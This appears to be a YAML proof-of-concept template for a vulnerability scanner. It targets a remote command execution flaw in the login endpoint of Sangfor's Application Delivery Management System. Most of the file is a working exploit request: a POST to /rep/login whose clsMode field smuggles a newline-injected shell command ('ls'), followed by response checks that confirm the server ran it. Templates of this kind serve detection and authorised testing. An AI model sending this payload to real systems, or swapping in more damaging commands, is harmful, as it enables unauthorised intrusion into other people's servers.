id: poc-yaml-sangfor-application-delivery-management-system-login-rce
info:
  name: 深信服 应用交付管理系统 login 远程命令执行漏洞
  severity: critical
  tags:
  - rce
  finger: 应用交付管理系统
requests:
- method: POST
  path: /rep/login
  headers:
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
  data: clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
  expression: status_code == 200 && contains(body,"API-CT_SYS_FAIL_LIST") && contains(body,"cluster_mode_othersaclog")
    && content_type == "text/html"
variables: {}
transport: http
